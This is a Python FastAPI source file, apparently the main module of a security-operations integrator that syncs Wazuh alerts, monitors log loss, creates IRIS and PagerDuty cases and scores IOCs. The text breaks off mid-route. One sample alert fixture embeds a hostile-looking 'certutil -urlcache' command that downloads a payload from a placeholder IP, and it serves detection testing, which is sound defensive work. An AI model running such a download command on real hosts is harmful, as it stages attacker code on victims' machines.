import asyncio import logging import os import re import shlex import subprocess import uuid from collections import deque from datetime import datetime, timedelta, timezone from pathlib import Path from psycopg import sql from fastapi import Depends, FastAPI, File, HTTPException, Request, UploadFile import csv import io from fastapi.responses import FileResponse, Response, StreamingResponse from fastapi.staticfiles import StaticFiles from app.adapters.abuseipdb import AbuseIpdbAdapter from app.adapters.geoip import GeoIpAdapter from app.adapters.iris import IrisAdapter from app.adapters.pagerduty import PagerDutyAdapter from app.adapters.shuffle import ShuffleAdapter from app.adapters.virustotal import VirusTotalAdapter from app.adapters.wazuh import WazuhAdapter from app.config import settings from app.db import get_conn, init_schema from app.models import ( ActionCreateIncidentRequest, ApiResponse, CDetectionEvaluateRequest, IocEnrichRequest, IocEvaluateRequest, IrisAlertCreateRequest, IrisTicketCreateRequest, LogLossCheckRequest, LogLossStreamCheck, SimLogRunRequest, ShuffleLoginRequest, ShuffleProxyRequest, TriggerShuffleRequest, WazuhIngestRequest, ) from app.repositories.mvp_repo import MvpRepository from app.routes.mvp import build_mvp_router from app.security import require_internal_api_key from app.services.mvp_service import MvpService from app.services.c_detection_service import CDetectionService app = FastAPI(title=settings.app_name, version="0.1.0") logger = logging.getLogger(__name__) UI_DIR = Path(__file__).resolve().parent / "ui" UI_ASSETS_DIR = UI_DIR / "assets" SIM_SCRIPTS_DIR = Path("/app/scripts") SIM_RUN_LOGS_DIR = Path("/tmp/soc-integrator-sim-logs") wazuh_adapter = WazuhAdapter( base_url=settings.wazuh_base_url, username=settings.wazuh_username, password=settings.wazuh_password, indexer_url=settings.wazuh_indexer_url, indexer_username=settings.wazuh_indexer_username, indexer_password=settings.wazuh_indexer_password, ) shuffle_adapter = ShuffleAdapter( base_url=settings.shuffle_base_url, api_key=settings.shuffle_api_key, ) pagerduty_adapter = PagerDutyAdapter( base_url=settings.pagerduty_base_url, api_key=settings.pagerduty_api_key, ) iris_adapter = IrisAdapter( base_url=settings.iris_base_url, api_key=settings.iris_api_key, ) virustotal_adapter = VirusTotalAdapter( base_url=settings.virustotal_base_url, api_key=settings.virustotal_api_key, ) abuseipdb_adapter = AbuseIpdbAdapter( base_url=settings.abuseipdb_base_url, api_key=settings.abuseipdb_api_key, ) geoip_adapter = GeoIpAdapter( provider=settings.geoip_provider, cache_ttl_seconds=settings.geoip_cache_ttl_seconds, ) repo = MvpRepository() mvp_service = MvpService( repo=repo, wazuh_adapter=wazuh_adapter, shuffle_adapter=shuffle_adapter, iris_adapter=iris_adapter, pagerduty_adapter=pagerduty_adapter, ) c_detection_service = CDetectionService( repo=repo, geoip_adapter=geoip_adapter, ) app.include_router(build_mvp_router(mvp_service, require_internal_api_key)) app.mount("/ui/assets", StaticFiles(directory=str(UI_ASSETS_DIR)), name="ui-assets") @app.middleware("http") async def ui_no_cache_middleware(request: Request, call_next): response: Response = await call_next(request) if request.url.path == "/ui" or request.url.path.startswith("/ui/assets/"): response.headers["Cache-Control"] = "no-store, no-cache, must-revalidate, max-age=0" response.headers["Pragma"] = "no-cache" response.headers["Expires"] = "0" return response DEFAULT_LOG_LOSS_STREAMS: list[dict[str, object]] = [ { "name": "fortigate", "query": "full_log:fortigate OR full_log:FGT80F OR full_log:FGT60F OR full_log:FGT40F OR full_log:FGT501E", "min_count": 1, }, { "name": "windows_agent", "query": "full_log:windows_agent OR full_log:windows", "min_count": 1, }, { "name": "vmware", "query": "full_log:vmware", "min_count": 1, }, { "name": "log_monitor", "query": "full_log:log_monitor OR rule.id:100411", "min_count": 1, }, ] async def _execute_log_loss_check( req: LogLossCheckRequest, create_ticket: bool, ) -> dict[str, object]: minutes = max(1, int(req.minutes)) streams = req.streams or [LogLossStreamCheck(**item) for item in DEFAULT_LOG_LOSS_STREAMS] items: list[dict[str, object]] = [] loss_count = 0 error_count = 0 loss_stream_names: list[str] = [] for stream in streams: min_count = max(0, int(stream.min_count)) try: observed = await wazuh_adapter.count_alerts(query=stream.query, minutes=minutes) is_loss = observed < min_count if is_loss: loss_count += 1 loss_stream_names.append(stream.name) items.append( { "name": stream.name, "query": stream.query, "minutes": minutes, "min_count": min_count, "observed_count": observed, "status": "loss" if is_loss else "ok", } ) except Exception as exc: error_count += 1 items.append( { "name": stream.name, "query": stream.query, "minutes": minutes, "min_count": min_count, "observed_count": None, "status": "error", "error": str(exc), } ) summary = { "total_streams": len(items), "loss_streams": loss_count, "error_streams": error_count, "all_ok": loss_count == 0 and error_count == 0, } ticket_data: dict[str, object] | None = None if create_ticket and loss_count > 0: cooldown = max(0, int(settings.log_loss_monitor_ticket_cooldown_seconds)) now_ts = datetime.now(timezone.utc).timestamp() state = app.state.log_loss_monitor_state last_ticket_ts = float(state.get("last_ticket_ts", 0.0) or 0.0) in_cooldown = cooldown > 0 and (now_ts - last_ticket_ts) < cooldown if not in_cooldown: title = f"Log loss detected ({loss_count} stream(s))" description = ( f"Log-loss monitor detected missing telemetry in the last {minutes} minute(s). " f"Affected streams: {', '.join(loss_stream_names)}." ) case_payload = { "case_name": title, "case_description": description, "case_customer": settings.iris_default_customer_id, "case_soc_id": settings.iris_default_soc_id, } try: iris_result = await iris_adapter.create_case(case_payload) state["last_ticket_ts"] = now_ts ticket_data = {"created": True, "iris": iris_result} except Exception as exc: ticket_data = {"created": False, "error": str(exc)} else: ticket_data = { "created": False, "skipped": "cooldown_active", "cooldown_seconds": cooldown, "last_ticket_ts": last_ticket_ts, } result: dict[str, object] = { "checked_at": datetime.now(timezone.utc).isoformat(), "minutes": minutes, "summary": summary, "streams": items, } if ticket_data is not None: result["ticket"] = ticket_data return result async def _log_loss_monitor_loop() -> None: interval = max(5, int(settings.log_loss_monitor_interval_seconds)) while True: started_at = datetime.now(timezone.utc).isoformat() try: app.state.log_loss_monitor_state["running"] = True app.state.log_loss_monitor_state["last_started_at"] = started_at req = LogLossCheckRequest(minutes=max(1, int(settings.log_loss_monitor_window_minutes))) result = await _execute_log_loss_check( req=req, create_ticket=bool(settings.log_loss_monitor_create_iris_ticket), ) app.state.log_loss_monitor_state["last_status"] = "ok" app.state.log_loss_monitor_state["last_result"] = result app.state.log_loss_monitor_state["last_finished_at"] = datetime.now(timezone.utc).isoformat() logger.info( "log-loss monitor checked=%s loss=%s errors=%s", result.get("summary", {}).get("total_streams", 0), result.get("summary", {}).get("loss_streams", 0), result.get("summary", {}).get("error_streams", 0), ) except Exception as exc: app.state.log_loss_monitor_state["last_status"] = "error" app.state.log_loss_monitor_state["last_error"] = str(exc) app.state.log_loss_monitor_state["last_finished_at"] = datetime.now(timezone.utc).isoformat() logger.exception("log-loss monitor failed: %s", exc) finally: app.state.log_loss_monitor_state["running"] = False await asyncio.sleep(interval) async def _wazuh_auto_sync_loop() -> None: interval = max(5, int(settings.wazuh_auto_sync_interval_seconds)) while True: started_at = datetime.now(timezone.utc).isoformat() try: app.state.wazuh_auto_sync_state["running"] = True app.state.wazuh_auto_sync_state["last_started_at"] = started_at result = await mvp_service.sync_wazuh_alerts( query=settings.wazuh_auto_sync_query, limit=settings.wazuh_auto_sync_limit, minutes=settings.wazuh_auto_sync_minutes, ) app.state.wazuh_auto_sync_state["last_status"] = "ok" app.state.wazuh_auto_sync_state["last_result"] = result app.state.wazuh_auto_sync_state["last_finished_at"] = datetime.now(timezone.utc).isoformat() logger.info( "wazuh auto-sync processed=%s ingested=%s skipped=%s failed=%s ioc_evaluated=%s ioc_matched=%s ioc_rejected=%s", result.get("processed", 0), result.get("ingested", 0), result.get("skipped_existing", 0), result.get("failed", 0), result.get("ioc_evaluated", 0), result.get("ioc_matched", 0), result.get("ioc_rejected", 0), ) except Exception as exc: app.state.wazuh_auto_sync_state["last_status"] = "error" app.state.wazuh_auto_sync_state["last_error"] = str(exc) app.state.wazuh_auto_sync_state["last_finished_at"] = datetime.now(timezone.utc).isoformat() logger.exception("wazuh auto-sync failed: %s", exc) finally: app.state.wazuh_auto_sync_state["running"] = False await asyncio.sleep(interval) def _c_match_to_incident_event(match: dict[str, object]) -> dict[str, object]: event = dict(match.get("event") or {}) usecase_id = str(match.get("usecase_id") or "C-unknown") section = str(match.get("section") or "c") severity = str(match.get("severity") or "medium") entity = str(match.get("entity") or "unknown") evidence = dict(match.get("evidence") or {}) source = str(event.get("source") or "wazuh") timestamp = str(event.get("timestamp") or datetime.now(timezone.utc).isoformat()) event_id = str(event.get("event_id") or f"{usecase_id}-{int(datetime.now(timezone.utc).timestamp())}") payload = dict(event.get("payload") or {}) asset = dict(event.get("asset") or {}) network = dict(event.get("network") or {}) event_type = "c2_credential_abuse" if section == "c1": event_type = "c1_impossible_travel" elif section == "c3": event_type = "c3_lateral_movement" title = f"{usecase_id} detection for {entity}" description = f"{usecase_id} matched for entity={entity}. evidence={evidence}" tags = list(event.get("tags") or []) tags.extend(["appendix_c", usecase_id.lower(), section]) return { "source": source, "event_type": event_type, "event_id": event_id, "timestamp": timestamp, "severity": severity, "title": title, "description": description, "asset": asset, "network": network, "tags": sorted(set(tags)), "risk_context": {"appendix_c_usecase": usecase_id}, "raw": event.get("raw") or {}, "payload": payload, } @app.on_event("startup") async def startup() -> None: init_schema() repo.ensure_policy() app.state.wazuh_auto_sync_state = { "running": False, "last_status": None, "last_started_at": None, "last_finished_at": None, "last_error": None, "last_result": None, } app.state.log_loss_monitor_state = { "running": False, "last_status": None, "last_started_at": None, "last_finished_at": None, "last_error": None, "last_result": None, "last_ticket_ts": 0.0, } app.state.c_detection_state = { "last_status": None, "last_started_at": None, "last_finished_at": None, "last_error": None, "last_result": None, "last_ticket_ts_by_key": {}, } app.state.systems_monitor_state = { "last_ok_at": {}, } app.state.sim_runs = {} SIM_RUN_LOGS_DIR.mkdir(parents=True, exist_ok=True) if settings.wazuh_auto_sync_enabled: app.state.wazuh_auto_sync_task = asyncio.create_task(_wazuh_auto_sync_loop()) logger.info( "wazuh auto-sync enabled interval=%ss limit=%s minutes=%s query=%s", settings.wazuh_auto_sync_interval_seconds, settings.wazuh_auto_sync_limit, settings.wazuh_auto_sync_minutes, settings.wazuh_auto_sync_query, ) if settings.log_loss_monitor_enabled: app.state.log_loss_monitor_task = asyncio.create_task(_log_loss_monitor_loop()) logger.info( "log-loss monitor enabled interval=%ss window=%sm create_iris_ticket=%s cooldown=%ss", settings.log_loss_monitor_interval_seconds, settings.log_loss_monitor_window_minutes, settings.log_loss_monitor_create_iris_ticket, settings.log_loss_monitor_ticket_cooldown_seconds, ) @app.on_event("shutdown") async def shutdown() -> None: task = getattr(app.state, "wazuh_auto_sync_task", None) if task: task.cancel() try: await task except asyncio.CancelledError: pass ll_task = getattr(app.state, "log_loss_monitor_task", None) if ll_task: ll_task.cancel() try: await ll_task except asyncio.CancelledError: pass sim_runs = getattr(app.state, "sim_runs", {}) for run in sim_runs.values(): process = run.get("process") if process and process.poll() is None: process.terminate() @app.get( "/ui", summary="SOC Integrator UI", description="Serve the built-in Alpine.js operations console.", include_in_schema=False, ) async def ui_index() -> FileResponse: if not UI_DIR.exists(): raise HTTPException(status_code=404, detail="UI is not available in this build") return FileResponse(UI_DIR / "index.html") @app.get( "/health", response_model=ApiResponse, summary="Service health", description="Return soc-integrator service identity and configured upstream targets.", ) async def health() -> ApiResponse: return ApiResponse( data={ "service": settings.app_name, "env": settings.app_env, "targets": { "wazuh": settings.wazuh_base_url, "shuffle": settings.shuffle_base_url, "pagerduty": settings.pagerduty_base_url, "iris": settings.iris_base_url, }, } ) def _build_wazuh_hit_from_ingest(payload: WazuhIngestRequest) -> dict[str, object]: src_payload = dict(payload.payload or {}) src_payload.setdefault("@timestamp", datetime.now(timezone.utc).isoformat()) src_payload.setdefault("id", payload.alert_id) src_payload.setdefault( "rule", { "id": payload.rule_id or "unknown", "level": payload.severity if payload.severity is not None else 5, "description": payload.title or "Wazuh alert", }, ) return {"_id": payload.alert_id or f"wazuh-{uuid.uuid4().hex[:12]}", "_source": src_payload} def _normalize_wazuh_ingest_payload(payload: WazuhIngestRequest) -> dict[str, object]: normalized = { "source": payload.source, "alert_id": payload.alert_id, "rule_id": payload.rule_id, "severity": payload.severity, "title": payload.title, "payload": payload.payload, } hit = _build_wazuh_hit_from_ingest(payload) normalized_event = mvp_service.normalize_wazuh_hit(hit) return { "normalized": normalized, "normalized_event": normalized_event, } @app.post( "/ingest/wazuh-alert", response_model=ApiResponse, summary="Normalize Wazuh alert", description="Normalize a raw Wazuh alert payload into both legacy ingest shape and SOC normalized event shape.", ) async def ingest_wazuh_alert(payload: WazuhIngestRequest) -> ApiResponse: return ApiResponse(data=_normalize_wazuh_ingest_payload(payload)) @app.get( "/ingest/wazuh-alert/samples", response_model=ApiResponse, summary="Sample normalization cases", description="Return sample Wazuh event-log cases with expected normalized output for testing and integration.", ) async def ingest_wazuh_alert_samples() -> ApiResponse: sample_payloads = [ WazuhIngestRequest( source="wazuh", rule_id="110302", alert_id="sample-a1-02", severity=8, title="A1 production: DNS IOC domain match event", payload={ "@timestamp": datetime.now(timezone.utc).isoformat(), "full_log": "Mar 04 09:42:24 dns-fw-01 soc_mvp_test=true source=dns severity=medium event_type=ioc_domain_match src_ip=10.12.132.85 ioc_type=domain ioc_value=ioc-2080.malicious.example feed=threatintel_main confidence=high action=alert", "agent": {"name": "dns-fw-01", "id": "001"}, }, ), WazuhIngestRequest( source="wazuh", rule_id="110402", alert_id="sample-b1-02", severity=8, title="B1 production: ESXi SSH enabled", payload={ "@timestamp": datetime.now(timezone.utc).isoformat(), "full_log": "Mar 04 09:42:28 esxi-01 soc_mvp_test=true source=vmware severity=medium event_type=vmware_esxi_enable_ssh action=enable service=ssh user=root host=esxi-01 src_ip=203.0.113.115", "agent": {"name": "esxi-01", "id": "002"}, }, ), WazuhIngestRequest( source="wazuh", rule_id="110426", alert_id="sample-b3-06", severity=8, title="B3 production: CertUtil download pattern", payload={ "@timestamp": datetime.now(timezone.utc).isoformat(), "full_log": "Mar 04 09:42:35 win-sysmon-01 soc_mvp_test=true source=windows_sysmon severity=medium event_type=sysmon_certutil_download event_id=1 process=certutil.exe cmdline=\"certutil -urlcache -split -f http://198.51.100.22/payload.bin payload.bin\" src_ip=10.10.10.5", "agent": {"name": "win-sysmon-01", "id": "003"}, }, ), WazuhIngestRequest( source="wazuh", rule_id="110501", alert_id="sample-c1-01", severity=12, title="C1 production: Impossible travel", payload={ "@timestamp": datetime.now(timezone.utc).isoformat(), "full_log": "Mar 04 09:44:10 fgt-vpn-01 source=vpn severity=high event_type=vpn_login_success event_id=4624 success=true user=alice.admin src_ip=8.8.8.8 country=US src_lat=37.3861 src_lon=-122.0839 dst_host=vpn-gw-01", "agent": {"name": "fgt-vpn-01", "id": "004"}, }, ), ] cases = [] for item in sample_payloads: cases.append( { "name": str(item.alert_id), "request": item.model_dump(mode="json"), "result": _normalize_wazuh_ingest_payload(item), } ) return ApiResponse(data={"cases": cases, "count": len(cases)}) @app.post( "/action/create-incident", response_model=ApiResponse, summary="Create PagerDuty incident", description="Create an incident in PagerDuty (stub or real integration) from request payload.", ) async def create_incident(payload: ActionCreateIncidentRequest) -> ApiResponse: incident_payload = { "title": payload.title, "urgency": payload.severity, "incident_key": payload.dedupe_key, "body": payload.payload, "source": payload.source, } try: pd_result = await pagerduty_adapter.create_incident(incident_payload) except Exception as exc: raise HTTPException(status_code=502, detail=f"PagerDuty call failed: {exc}") from exc return ApiResponse(data={"pagerduty": pd_result}) @app.post( "/action/trigger-shuffle", response_model=ApiResponse, summary="Trigger Shuffle workflow", description="Execute a Shuffle workflow by ID with execution_argument payload.", ) async def trigger_shuffle(payload: TriggerShuffleRequest) -> ApiResponse: try: shuffle_result = await shuffle_adapter.trigger_workflow( workflow_id=payload.workflow_id, payload=payload.execution_argument, ) except Exception as exc: raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc return ApiResponse(data={"shuffle": shuffle_result}) @app.get( "/shuffle/health", response_model=ApiResponse, summary="Shuffle health", description="Check Shuffle backend health endpoint through adapter connectivity.", ) async def shuffle_health() -> ApiResponse: try: result = await shuffle_adapter.health() except Exception as exc: raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc return ApiResponse(data={"shuffle": result}) @app.get( "/shuffle/auth-test", response_model=ApiResponse, summary="Shuffle auth test", description="Validate Shuffle API key authentication.", ) async def shuffle_auth_test() -> ApiResponse: try: result = await shuffle_adapter.auth_test() except Exception as exc: raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc return ApiResponse(data={"shuffle": result}) @app.post( "/shuffle/login", response_model=ApiResponse, summary="Shuffle login", description="Login to Shuffle with username/password and return auth response.", ) async def shuffle_login(payload: ShuffleLoginRequest) -> ApiResponse: try: result = await shuffle_adapter.login(payload.username, payload.password) except Exception as exc: raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc return ApiResponse(data={"shuffle": result}) @app.post( "/shuffle/generate-apikey", response_model=ApiResponse, summary="Generate Shuffle API key", description="Login using provided or configured credentials and generate a Shuffle API key.", ) async def shuffle_generate_apikey(payload: ShuffleLoginRequest | None = None) -> ApiResponse: username = payload.username if payload else settings.shuffle_username password = payload.password if payload else settings.shuffle_password if not username or not password: raise HTTPException( status_code=400, detail="Missing shuffle credentials. Provide username/password in body or set SHUFFLE_USERNAME and SHUFFLE_PASSWORD.", ) try: result = await shuffle_adapter.generate_apikey_from_login(username, password) except Exception as exc: raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc return ApiResponse(data={"shuffle": result}) @app.get( "/shuffle/workflows", response_model=ApiResponse, summary="List Shuffle workflows", description="List available workflows in Shuffle using configured API key.", ) async def shuffle_workflows() -> ApiResponse: try: result = await shuffle_adapter.list_workflows() except Exception as exc: raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc return ApiResponse(data={"shuffle": result}) @app.get( "/shuffle/workflows/{workflow_id}", response_model=ApiResponse, summary="Get Shuffle workflow", description="Get a single Shuffle workflow definition by workflow ID.", ) async def shuffle_workflow(workflow_id: str) -> ApiResponse: try: result = await shuffle_adapter.get_workflow(workflow_id) except Exception as exc: raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc return ApiResponse(data={"shuffle": result}) @app.post( "/shuffle/workflows/{workflow_id}/execute", response_model=ApiResponse, summary="Execute Shuffle workflow", description="Execute a specific Shuffle workflow with custom JSON payload.", ) async def shuffle_workflow_execute( workflow_id: str, payload: dict[str, object] ) -> ApiResponse: try: result = await shuffle_adapter.trigger_workflow(workflow_id=workflow_id, payload=payload) except Exception as exc: raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc return ApiResponse(data={"shuffle": result}) @app.get( "/shuffle/apps", response_model=ApiResponse, summary="List Shuffle apps", description="List installed/available Shuffle apps from app API.", ) async def shuffle_apps() -> ApiResponse: try: result = await shuffle_adapter.list_apps() except Exception as exc: raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc return ApiResponse(data={"shuffle": result}) @app.post( "/shuffle/proxy", response_model=ApiResponse, summary="Proxy request to Shuffle API", description="Forward arbitrary HTTP request to Shuffle API path via configured credentials.", ) async def shuffle_proxy(payload: ShuffleProxyRequest) -> ApiResponse: path = payload.path if payload.path.startswith("/api/") else f"/api/v1/{payload.path.lstrip('/')}" try: result = await shuffle_adapter.proxy( method=payload.method, path=path, params=payload.params, payload=payload.payload, ) except Exception as exc: raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc return ApiResponse(data={"shuffle": result}) @app.post( "/action/create-iris-case", response_model=ApiResponse, summary="Create IRIS case (action)", description="Create an IRIS case using action payload fields and defaults.", ) async def create_iris_case(payload: ActionCreateIncidentRequest) -> ApiResponse: # IRIS v2 expects case_name, case_description, case_customer, case_soc_id. case_payload = { "case_name": payload.title, "case_description": payload.payload.get("description", "Created by soc-integrator"), "case_customer": payload.payload.get("case_customer", settings.iris_default_customer_id), "case_soc_id": payload.payload.get("case_soc_id", settings.iris_default_soc_id), } try: iris_result = await iris_adapter.create_case(case_payload) except Exception as exc: raise HTTPException(status_code=502, detail=f"IRIS call failed: {exc}") from exc return ApiResponse(data={"iris": iris_result}) @app.post( "/iris/tickets", response_model=ApiResponse, summary="Create IRIS ticket", description="Create an IRIS case/ticket directly using ticket request model.", ) async def iris_create_ticket(payload: IrisTicketCreateRequest) -> ApiResponse: case_payload = { "case_name": payload.title, "case_description": payload.description, "case_customer": payload.case_customer or settings.iris_default_customer_id, "case_soc_id": payload.case_soc_id or settings.iris_default_soc_id, } if payload.payload: case_payload.update(payload.payload) try: iris_result = await iris_adapter.create_case(case_payload) except Exception as exc: raise HTTPException(status_code=502, detail=f"IRIS call failed: {exc}") from exc return ApiResponse(data={"iris": iris_result}) @app.get( "/iris/tickets", response_model=ApiResponse, summary="List IRIS tickets", description="List IRIS cases with pagination, using v2 or legacy fallback endpoint.", ) async def iris_list_tickets(limit: int = 50, offset: int = 0) -> ApiResponse: try: iris_result = await iris_adapter.list_cases(limit=limit, offset=offset) except Exception as exc: raise HTTPException(status_code=502, detail=f"IRIS call failed: {exc}") from exc return ApiResponse(data={"iris": iris_result}) def _build_vt_ioc_result( vt: dict[str, object], ioc_type: str, ioc_value: str, malicious_threshold: int, suspicious_threshold: int, ) -> tuple[dict[str, object], bool, str, float]: stats = ( (((vt.get("data") or {}).get("attributes") or {}).get("last_analysis_stats")) if isinstance(vt, dict) else None ) or {} malicious = int(stats.get("malicious", 0) or 0) suspicious = int(stats.get("suspicious", 0) or 0) harmless = int(stats.get("harmless", 0) or 0) undetected = int(stats.get("undetected", 0) or 0) total = malicious + suspicious + harmless + undetected confidence = 0.0 if total == 0 else round(((malicious + (0.5 * suspicious)) / total), 4) matched = (malicious >= malicious_threshold) or (suspicious >= suspicious_threshold) severity = "low" if malicious >= 5 or suspicious >= 10: severity = "critical" elif malicious >= 2 or suspicious >= 5: severity = "high" elif malicious >= 1 or suspicious >= 1: severity = "medium" reason = ( f"virustotal_stats malicious={malicious} suspicious={suspicious} " f"thresholds(malicious>={malicious_threshold}, suspicious>={suspicious_threshold})" ) result: dict[str, object] = { "ioc_type": ioc_type, "ioc_value": ioc_value, "matched": matched, "severity": severity, "confidence": confidence, "reason": reason, "providers": { "virustotal": { "stats": stats, } }, "raw": { "virustotal": vt, }, } return result, matched, severity, confidence def _build_abuseipdb_ioc_result( abuse: dict[str, object], ioc_value: str, confidence_threshold: int = 50, ) -> tuple[dict[str, object], bool, str, float]: data = ((abuse.get("data") if isinstance(abuse, dict) else None) or {}) if isinstance(abuse, dict) else {} score = int(data.get("abuseConfidenceScore", 0) or 0) total_reports = int(data.get("totalReports", 0) or 0) matched = score >= confidence_threshold severity = "low" if score >= 90: severity = "critical" elif score >= 70: severity = "high" elif score >= 30: severity = "medium" confidence = round(score / 100.0, 4) reason = f"abuseipdb score={score} totalReports={total_reports} threshold>={confidence_threshold}" result: dict[str, object] = { "ioc_type": "ip", "ioc_value": ioc_value, "matched": matched, "severity": severity, "confidence": confidence, "reason": reason, "providers": {"abuseipdb": {"score": score, "totalReports": total_reports, "raw": abuse}}, } return result, matched, severity, confidence def _extract_first_array(payload: object) -> list[object]: if isinstance(payload, list): return payload if not isinstance(payload, dict): return [] preferred_keys = [ "items", "results", "workflows", "apps", "affected_items", "data", ] for key in preferred_keys: value = payload.get(key) if isinstance(value, list): return value for value in payload.values(): extracted = _extract_first_array(value) if extracted: return extracted return [] SIM_SCRIPT_MAP: dict[str, str] = { "fortigate": "send-wazuh-fortigate-test-events.sh", "endpoint": "send-wazuh-endpoint-agent-test-events.sh", "cisco": "send-wazuh-cisco-test-events.sh", "proposal_required": "send-wazuh-proposal-required-events.sh", "proposal_appendix_b": "send-wazuh-proposal-appendix-b-events.sh", "proposal_appendix_c": "send-wazuh-proposal-appendix-c-events.sh", "wazuh_test": "send-wazuh-test-events.sh", } def _build_sim_command(payload: SimLogRunRequest) -> list[str]: script_name = SIM_SCRIPT_MAP[payload.script] script_path = SIM_SCRIPTS_DIR / script_name count = max(1, int(payload.count)) delay = max(0.0, float(payload.delay_seconds)) if payload.script == "endpoint": cmd = [ "/bin/bash", str(script_path), payload.target or "all", payload.scenario or "all", str(count), str(delay), ] else: cmd = [ "/bin/bash", str(script_path), payload.target or "all", str(count), str(delay), ] if payload.forever: cmd.append("--forever") return cmd def _serialize_sim_run(run_id: str, run: dict[str, object]) -> dict[str, object]: process = run.get("process") poll_code = process.poll() if process else None return_code = run.get("return_code") if poll_code is not None and return_code is None: run["return_code"] = poll_code return_code = poll_code return { "run_id": run_id, "script": run.get("script"), "target": run.get("target"), "scenario": run.get("scenario"), "count": run.get("count"), "delay_seconds": run.get("delay_seconds"), "forever": run.get("forever"), "pid": run.get("pid"), "cmd": run.get("cmd"), "started_at": run.get("started_at"), "stopped_at": run.get("stopped_at"), "running": bool(process and process.poll() is None), "return_code": return_code, "log_file": run.get("log_file"), } def _tail_log_lines(path: Path, limit: int = 200) -> list[str]: line_limit = max(1, min(int(limit), 1000)) lines: deque[str] = deque(maxlen=line_limit) try: with path.open("r", encoding="utf-8", errors="replace") as handle: for line in handle: lines.append(line.rstrip("\n")) except FileNotFoundError: return [] return list(lines) def _safe_query_token(value: object) -> str | None: text = str(value or "").strip() if not text: return None if not re.fullmatch(r"[A-Za-z0-9_.:-]+", text): return None return text def _parse_iso_datetime(value: object) -> datetime | None: text = str(value or "").strip() if not text: return None if text.endswith("Z"): text = text[:-1] + "+00:00" try: parsed = datetime.fromisoformat(text) except ValueError: return None if parsed.tzinfo is None: parsed = parsed.replace(tzinfo=timezone.utc) return parsed.astimezone(timezone.utc) def _sim_wazuh_query_clauses(run: dict[str, object]) -> list[str]: script = str(run.get("script") or "").strip().lower() target = str(run.get("target") or "all").strip() scenario = str(run.get("scenario") or "all").strip().lower() target_token = _safe_query_token(target) _ = scenario clauses: list[str] = ["(full_log:*soc_mvp_test=true* OR data.soc_mvp_test:true)"] if script == "fortigate": clauses.append( "(full_log:*fortigate* OR full_log:*FGT80F* OR full_log:*FGT60F* OR full_log:*FGT40F* " "OR full_log:*FGT501E* OR data.vendor:fortinet OR data.product:fortigate OR data.source:fortigate)" ) if target_token and target_token.lower() != "all": clauses.append(f"(full_log:*{target_token}* OR data.model:{target_token})") elif script == "endpoint": if target_token and target_token.lower() != "all": lowered = target_token.lower() if lowered in {"windows", "win"}: clauses.append( "(full_log:*source=windows* OR full_log:*source=windows_agent* " "OR data.source:windows OR data.source:windows_agent OR data.platform:windows)" ) elif lowered in {"mac", "macos"}: clauses.append( "(full_log:*source=mac* OR full_log:*source=mac_agent* " "OR data.source:mac OR data.source:mac_agent OR data.platform:mac)" ) elif lowered == "linux": clauses.append( "(full_log:*source=linux* OR full_log:*source=linux_agent* " "OR data.source:linux OR data.source:linux_agent OR data.platform:linux)" ) else: clauses.append(f"full_log:*{target_token}*") else: clauses.append( "(full_log:*source=windows* OR full_log:*source=windows_agent* " "OR full_log:*source=mac* OR full_log:*source=mac_agent* " "OR full_log:*source=linux* OR full_log:*source=linux_agent* " "OR data.source:windows OR data.source:windows_agent " "OR data.source:mac OR data.source:mac_agent " "OR data.source:linux OR data.source:linux_agent)" ) elif script == "cisco": clauses.append("(full_log:*cisco* OR data.vendor:cisco)") if target_token and target_token.lower() != "all": clauses.append(f"full_log:*{target_token}*") elif script in {"proposal_required", "proposal_appendix_b", "proposal_appendix_c", "wazuh_test"}: clauses.append("(full_log:*soc_mvp_test=true* OR data.soc_mvp_test:true)") if target_token and target_token.lower() != "all": clauses.append(f"full_log:*{target_token}*") else: clauses.append("full_log:*soc_mvp_test=true*") return clauses def _extract_wazuh_hits(payload: object) -> list[dict[str, object]]: if not isinstance(payload, dict): return [] hits_root = payload.get("hits") if not isinstance(hits_root, dict): return [] hits = hits_root.get("hits") if not isinstance(hits, list): return [] result: list[dict[str, object]] = [] for hit in hits: if isinstance(hit, dict): result.append(hit) return result def _extract_wazuh_event_item(hit: dict[str, object], include_raw: bool) -> dict[str, object]: source = hit.get("_source") if isinstance(hit.get("_source"), dict) else {} source = source if isinstance(source, dict) else {} agent = source.get("agent") if isinstance(source.get("agent"), dict) else {} agent = agent if isinstance(agent, dict) else {} decoder = source.get("decoder") if isinstance(source.get("decoder"), dict) else {} decoder = decoder if isinstance(decoder, dict) else {} data = source.get("data") if isinstance(source.get("data"), dict) else {} data = data if isinstance(data, dict) else {} rule = source.get("rule") if isinstance(source.get("rule"), dict) else {} rule = rule if isinstance(rule, dict) else {} item: dict[str, object] = { "@timestamp": source.get("@timestamp") or source.get("timestamp"), "event_id": data.get("event_id") or source.get("id") or hit.get("_id"), "agent_name": agent.get("name"), "agent_id": agent.get("id"), "decoder_name": decoder.get("name"), "source": data.get("source"), "event_type": data.get("event_type"), "severity": data.get("severity"), "rule_id": rule.get("id"), "rule_description": rule.get("description"), "full_log": source.get("full_log"), } if include_raw: item["raw"] = source return item def _extract_wazuh_rule_item(hit: dict[str, object], include_raw: bool) -> dict[str, object] | None: source = hit.get("_source") if isinstance(hit.get("_source"), dict) else {} source = source if isinstance(source, dict) else {} rule = source.get("rule") if isinstance(source.get("rule"), dict) else {} rule = rule if isinstance(rule, dict) else {} rule_id = rule.get("id") if rule_id in {None, ""}: return None agent = source.get("agent") if isinstance(source.get("agent"), dict) else {} agent = agent if isinstance(agent, dict) else {} data = source.get("data") if isinstance(source.get("data"), dict) else {} data = data if isinstance(data, dict) else {} item: dict[str, object] = { "@timestamp": source.get("@timestamp") or source.get("timestamp"), "rule_id": rule_id, "rule_level": rule.get("level"), "rule_description": rule.get("description"), "rule_firedtimes": rule.get("firedtimes"), "event_id": data.get("event_id") or source.get("id") or hit.get("_id"), "agent_name": agent.get("name"), "full_log": source.get("full_log"), } if include_raw: item["raw"] = source return item @app.post( "/ioc/enrich", 